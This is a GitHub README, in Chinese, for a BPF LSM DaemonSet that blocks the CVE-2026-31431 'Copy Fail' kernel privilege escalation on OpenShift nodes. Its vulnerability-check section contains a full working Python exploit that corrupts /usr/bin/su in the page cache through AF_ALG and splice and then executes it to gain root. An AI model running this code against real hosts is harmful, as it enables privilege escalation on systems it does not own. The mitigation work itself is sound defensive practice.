mrunalp/block-copyfail
GitHub: mrunalp/block-copyfail
基于 BPF LSM 的 DaemonSet 方案,可在不重启 OpenShift 节点的前提下即时阻断 CVE-2026-31431 内核权限提升漏洞利用链。
Stars: 1 | Forks: 0
## 摘要
CVE-2026-31431(“Copy Fail”)是一个 Linux 内核权限提升漏洞
存在于 `algif_aead` 加密接口中。攻击者利用带有
`authencesn` 算法和 `splice()` 的 AF\_ALG 套接字来破坏内核
页缓存中的任意文件 —— 包括 `/usr/bin/su` 等 setuid 二进制文件。
本文档提供了一种使用 BPF LSM DaemonSet 的**零重启修复**方案,
该方案仅阻止存在漏洞的 `authencesn` 算法绑定。该方案已在三个
独立的 OCP 4.22 集群上进行了端到端测试。
## 快速开始
```
# 1. 验证 BPF LSM 已启用 (RHEL CoreOS 9.8 默认启用)
oc debug node/ -- chroot /host cat /sys/kernel/security/lsm
# 必须包含 "bpf"
# 2. 部署 namespace 并授予 privileged SCC
oc apply -f daemonset.yaml
oc adm policy add-scc-to-user privileged -z default -n block-copyfail
# 3. DaemonSet pods 将在所有节点上自动启动
# 4. 验证
oc get pods -n block-copyfail # All nodes should show Running
oc logs -n block-copyfail -l app=block-copyfail
# 预期: "block-copyfail: blocker active — authencesn bind blocked"
```
无需重启。无需节点排空。无需 Pod 重启。防护即刻生效,
并覆盖所有节点上的所有进程(100% 覆盖)。
## 目录
1. [漏洞利用原理](#how-the-exploit-works)
2. [确认集群是否存在漏洞](#confirming-vulnerability-on-your-cluster)
3. [BPF LSM DaemonSet 部署](#bpf-lsm-daemonset-deployment)
4. [部署后验证](#post-deployment-verification)
5. [从源代码构建镜像](#building-the-image-from-source)
6. [移除](#removal)
## 漏洞利用原理
该漏洞利用链串起了三个内核特性:
1. **AF\_ALG 套接字** — 通过以下方式为内核加密创建用户空间句柄:
`socket(AF_ALG, SOCK_SEQPACKET, 0)`
2. **AEAD 绑定** — 绑定到 `authencesn(hmac(sha256),cbc(aes))`,一种特定
的认证加密算法
3. **splice() + sendmsg()** — 当源和目标页映射不同时,内核错误地执行了“就地”
操作,破坏了只读文件的页缓存
攻击者在页缓存中破坏了 `/usr/bin/su`(无需对该文件的写权限),
然后执行它以获取 root 权限。
## 确认集群是否存在漏洞
### 步骤 1:保存测试脚本
将以下内容保存为 `cve_test.py`。它使用相同的 payload 针对 `/usr/bin/su` 复现了
原始漏洞利用的页缓存破坏过程。此破坏仅影响容器的 overlayfs 副本,
不会影响主机。
```
#!/usr/bin/env python3
"""CVE-2026-31431 vulnerability test targeting /usr/bin/su."""
import os, sys, socket, hashlib, zlib, ctypes, ctypes.util, subprocess
libc = ctypes.CDLL(ctypes.util.find_library("c"))
libc.splice.argtypes = [
ctypes.c_int, ctypes.POINTER(ctypes.c_longlong),
ctypes.c_int, ctypes.POINTER(ctypes.c_longlong),
ctypes.c_size_t, ctypes.c_uint,
]
libc.splice.restype = ctypes.c_longlong
def _splice(fd_in, fd_out, length, offset_src=None):
if offset_src is not None:
off = ctypes.c_longlong(offset_src)
return libc.splice(fd_in, ctypes.byref(off), fd_out, None, length, 0)
return libc.splice(fd_in, None, fd_out, None, length, 0)
def d(x):
return bytes.fromhex(x)
def try_corrupt(fd, offset, payload):
SOL_ALG = 279
try:
a = socket.socket(38, 5, 0)
except OSError as e:
print(f" AF_ALG socket creation failed: {e}")
return False
try:
a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
except OSError as e:
print(f" AF_ALG bind failed: {e}")
a.close()
return False
try:
a.setsockopt(SOL_ALG, 1, d('0800010000000010' + '0' * 64))
a.setsockopt(SOL_ALG, 5, None, 4)
u, _ = a.accept()
o = offset + 4
z = d('00')
u.sendmsg(
[b"A" * 4 + payload],
[(SOL_ALG, 3, z * 4),
(SOL_ALG, 2, b'\x10' + z * 19),
(SOL_ALG, 4, b'\x08' + z * 3)],
32768,
)
r, w = os.pipe()
_splice(fd, w, o, offset_src=0)
_splice(r, u.fileno(), o)
try:
u.recv(8 + offset)
except Exception:
pass
os.close(r)
os.close(w)
u.close()
except OSError as e:
print(f" Exploit step failed: {e}")
a.close()
return False
a.close()
return True
TARGET = "/usr/bin/su"
print("=== CVE-2026-31431 Vulnerability Test ===")
print(f"Target: {TARGET}")
print()
with open(TARGET, "rb") as f:
orig_hash = hashlib.sha256(f.read()).hexdigest()
print(f"Original SHA256: {orig_hash}")
payload = zlib.decompress(d(
"78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d"
"209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675"
"c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
))
fd = os.open(TARGET, os.O_RDONLY)
i = 0
ok = True
print(f"Attempting splice + AF_ALG page-cache corruption "
f"({len(payload)} bytes in {len(payload)//4} chunks)...")
while i < len(payload):
if not try_corrupt(fd, i, payload[i:i+4]):
ok = False
break
i += 4
os.close(fd)
if not ok:
print()
print("RESULT: CANNOT TEST - AF_ALG or splice not available/permitted")
sys.exit(2)
with open(TARGET, "rb") as f:
after_hash = hashlib.sha256(f.read()).hexdigest()
print(f"After SHA256: {after_hash}")
print()
if orig_hash != after_hash:
print("PAGE CACHE CORRUPTION: YES - /usr/bin/su was modified in the page cache")
else:
print("PAGE CACHE CORRUPTION: NO - /usr/bin/su is intact")
print()
print("RESULT: NOT VULNERABLE")
sys.exit(0)
print()
print("Attempting to execute corrupted /usr/bin/su ...")
try:
r = subprocess.run([TARGET, "-c", "id"], capture_output=True, timeout=5)
stdout = r.stdout.decode(errors="replace").strip()
stderr = r.stderr.decode(errors="replace").strip()
print(f" exit code: {r.returncode}")
if stdout:
print(f" stdout: {stdout}")
if stderr:
print(f" stderr: {stderr}")
if "uid=0" in stdout:
print()
print("RESULT: FULLY EXPLOITABLE - gained root via corrupted su")
else:
print()
print("RESULT: PARTIALLY MITIGATED")
print(" Page-cache corruption succeeded (kernel is vulnerable)")
print(" Privilege escalation blocked (allowPrivilegeEscalation=false)")
except Exception as e:
print(f" execution failed: {e}")
print()
print("RESULT: PARTIALLY MITIGATED")
print(" Page-cache corruption succeeded (kernel is vulnerable)")
print(" Corrupted binary could not execute")
```
### 步骤 2:在集群上运行测试
```
oc create namespace cve-test
oc create configmap cve-test-script -n cve-test --from-file=cve_test.py
cat <<'EOF' | oc apply -f -
apiVersion: v1
kind: Pod
metadata:
name: cve-test
namespace: cve-test
annotations:
openshift.io/required-scc: restricted-v2
spec:
restartPolicy: Never
containers:
- name: test
image: registry.access.redhat.com/ubi9/python-39:latest
command: ["python3", "/scripts/cve_test.py"]
volumeMounts:
- name: script
mountPath: /scripts
readOnly: true
volumes:
- name: script
configMap:
name: cve-test-script
EOF
```
### 步骤 3:检查结果
```
oc wait pod/cve-test -n cve-test \
--for=jsonpath='{.status.phase}'=Succeeded --timeout=120s
oc logs -n cve-test cve-test
```
**在存在漏洞的集群上**,您将看到:
```
=== CVE-2026-31431 Vulnerability Test ===
Target: /usr/bin/su
Original SHA256: 8969560ae8e6e21c6184c1451f59418822ee69dd5d946d71987b55236bbc0feb
Attempting splice + AF_ALG page-cache corruption (160 bytes in 40 chunks)...
After SHA256: 30b0f5b5a054c4df65b48ca792863bf7054b4d793f15f57163792ba6c2b151ae
PAGE CACHE CORRUPTION: YES - /usr/bin/su was modified in the page cache
Attempting to execute corrupted /usr/bin/su ...
exit code: 0
RESULT: PARTIALLY MITIGATED
Page-cache corruption succeeded (kernel is vulnerable)
Privilege escalation blocked (allowPrivilegeEscalation=false)
```
### 步骤 4:清理
```
oc delete namespace cve-test
```
## BPF LSM DaemonSet 部署
BPF LSM 方法在内核级别挂钩 `socket_bind`,并仅阻止
`authencesn` 算法的绑定。它基于
[block-copyfail](https://github.com/atgreen/block-copyfail),使用
libbpf 以 C 语言重写,以便于 OCP 部署。
### 前置条件
必须启用 BPF LSM。RHEL CoreOS 9.8 (OCP 4.22) 默认已启用。
请使用以下命令验证:
```
oc debug node/ -- chroot /host cat /sys/kernel/security/lsm
```
预期输出包含 `bpf`:
```
lockdown,capability,landlock,yama,selinux,bpf
```
如果 `bpf` **不**存在,则需要一次性 MachineConfig(这是
唯一需要重启的场景):
```
apiVersion: machineconfiguration.openshift.io/v1
kind: MachineConfig
metadata:
labels:
machineconfiguration.openshift.io/role: worker
name: 99-enable-bpf-lsm
spec:
kernelArguments:
- lsm=lockdown,capability,selinux,bpf
```
### 步骤 1:创建命名空间、授予 SCC 并部署
必须在创建 DaemonSet Pod 之前授予特权 SCC,
否则 Pod 创建将失败并报 SCC 验证错误。
```
# 创建 namespace
cat <<'EOF' | oc apply -f -
apiVersion: v1
kind: Namespace
metadata:
name: block-copyfail
labels:
pod-security.kubernetes.io/enforce: privileged
pod-security.kubernetes.io/audit: privileged
pod-security.kubernetes.io/warn: privileged
EOF
# 将 privileged SCC 授予 default service account
oc adm policy add-scc-to-user privileged -z default -n block-copyfail
# 部署 DaemonSet
cat <<'EOF' | oc apply -f -
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: block-copyfail
namespace: block-copyfail
labels:
app: block-copyfail
spec:
selector:
matchLabels:
app: block-copyfail
template:
metadata:
labels:
app: block-copyfail
spec:
priorityClassName: system-node-critical
tolerations:
- operator: Exists
containers:
- name: blocker
image: quay.io/mrunalp/block-copyfail:latest
securityContext:
privileged: true
volumeMounts:
- name: bpf
mountPath: /sys/fs/bpf
- name: btf
mountPath: /sys/kernel/btf/vmlinux
readOnly: true
resources:
requests:
cpu: 10m
memory: 32Mi
limits:
cpu: 100m
memory: 64Mi
volumes:
- name: bpf
hostPath:
path: /sys/fs/bpf
type: DirectoryOrCreate
- name: btf
hostPath:
path: /sys/kernel/btf/vmlinux
type: File
terminationGracePeriodSeconds: 5
EOF
```
### 步骤 2:等待 Pod 在所有节点上启动
```
oc get pods -n block-copyfail -o wide
```
预期:每个节点一个 Pod,全部为 `Running` 状态:
```
NAME READY STATUS AGE NODE
block-copyfail-2jhzf 1/1 Running 34s ci-...-master-2
block-copyfail-4dfq7 1/1 Running 34s ci-...-master-1
block-copyfail-c2ts8 1/1 Running 34s ci-...-worker-c
block-copyfail-ctblk 1/1 Running 34s ci-...-worker-a
block-copyfail-m26sx 1/1 Running 34s ci-...-worker-b
block-copyfail-xsh6d 1/1 Running 34s ci-...-master-0
```
### 步骤 3:验证阻止程序是否处于活动状态
```
oc logs -n block-copyfail -l app=block-copyfail
```
预期:
```
block-copyfail: blocker active — authencesn bind blocked
```
## 部署后验证
从[确认是否存在漏洞](#confirming-vulnerability-on-your-cluster)部分重新运行相同的漏洞利用测试。
**在部署 BPF LSM DaemonSet 之后**,输出将是:
```
=== CVE-2026-31431 Vulnerability Test ===
Target: /usr/bin/su
Original SHA256: 30b0f5b5a054c4df65b48ca792863bf7054b4d793f15f57163792ba6c2b151ae
Attempting splice + AF_ALG page-cache corruption (160 bytes in 40 chunks)...
AF_ALG bind failed: [Errno 1] Operation not permitted
RESULT: CANNOT TEST - AF_ALG or splice not available/permitted
```
DaemonSet 日志将显示被阻止的尝试:
```
oc logs -n block-copyfail -l app=block-copyfail
```
```
block-copyfail: blocker active — authencesn bind blocked
block-copyfail: BLOCKED pid=16777 comm=python3 time=2026-05-01 16:37:23
```
### 验证其他算法未受影响
在节点上运行 `verify-algos.py`,以确认仅 `authencesn` 被阻止,
而其他 AF\_ALG 算法(GCM、CCM、SHA-256、AES-CBC)继续正常工作:
```
oc debug node/ -- chroot /host python3 -c "
import socket
tests = [
('aead', 'gcm(aes)'),
('aead', 'ccm(aes)'),
('aead', 'rfc4106(gcm(aes))'),
('hash', 'sha256'),
('skcipher', 'cbc(aes)'),
('aead', 'authencesn(hmac(sha256),cbc(aes))'),
]
for t, n in tests:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
s.bind((t, n))
print(f' ALLOWED {t}/{n}')
except OSError as e:
print(f' BLOCKED {t}/{n} -- {e}')
finally:
s.close()
"
```
预期输出:
```
ALLOWED aead/gcm(aes)
ALLOWED aead/ccm(aes)
ALLOWED aead/rfc4106(gcm(aes))
ALLOWED hash/sha256
ALLOWED skcipher/cbc(aes)
BLOCKED aead/authencesn(hmac(sha256),cbc(aes)) -- [Errno 1] Operation not permitted
```
这确认了 BPF LSM 仅阻止存在漏洞的算法。
## 从源代码构建镜像
BPF LSM 阻止程序的源代码位于 `block-copyfail/`:
```
block-copyfail/
block_copyfail.bpf.c # BPF kernel program (LSM hook)
block_copyfail.c # Userspace loader (libbpf skeleton)
block_copyfail.h # Shared event struct
Makefile # Build pipeline
Dockerfile # Multi-stage build
daemonset.yaml # Namespace + DaemonSet manifest
trigger-test.py # Quick validation script
```
构建并推送:
```
cd block-copyfail/
podman build -t quay.io//block-copyfail:latest .
podman push quay.io//block-copyfail:latest
```
Dockerfile 使用多阶段构建:包含 clang/bpftool/libbpf-devel 的 Fedora
用于编译,UBI 9 minimal 用作运行时镜像(约 122 MB)。
## 移除
删除 DaemonSet 会立即移除所有节点上的缓解措施:
```
oc delete -f daemonset.yaml
# 或
oc delete namespace block-copyfail
```
当加载器进程退出时,BPF 程序会自动分离。无需重启
或重启 Pod。
标签:0day挖掘, AF_ALG, algif_aead, BPF LSM, Copy Fail, CVE-2026-31431, DaemonSet, Linux内核漏洞, OCP 4.22, OpenShift, RHEL CoreOS, setuid, splice系统调用, Web截图, Web报告查看器, 内核安全, 内核页缓存损坏, 协议分析, 子域名突变, 客户端加密, 容器安全, 库, 应急响应, 权限提升, 漏洞缓解, 目录遍历, 补丁绕过, 请求拦截, 逆向工具, 零重启修复